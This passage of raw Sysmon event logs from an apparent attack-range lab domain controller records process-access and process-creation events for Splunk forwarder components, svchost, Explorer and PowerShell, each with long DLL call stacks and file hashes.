Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:02.987{266CAFBE-65AA-6064-4E01-00000000AE01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.736{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8 10341000x80000000000000009912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5 10341000x80000000000000009911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5 10341000x80000000000000009909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf 23542300x80000000000000009908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.532{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D43FF3AF845F123DBF43C1FBD7993F5,SHA256=2BD15CBB8E518ACDE6796A8DBC500CFFB093F09EE80840167AE758CB4451E74C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.220{266CAFBE-65AB-6064-4F01-00000000AE01}67965080C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.204{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.204{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000009904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.157{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35099BD333F38A080196D4EE68D33F4B,SHA256=32BD39095260FA371C380590DB6A617C01D656F4F2C9258163E52D2CA75F56BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
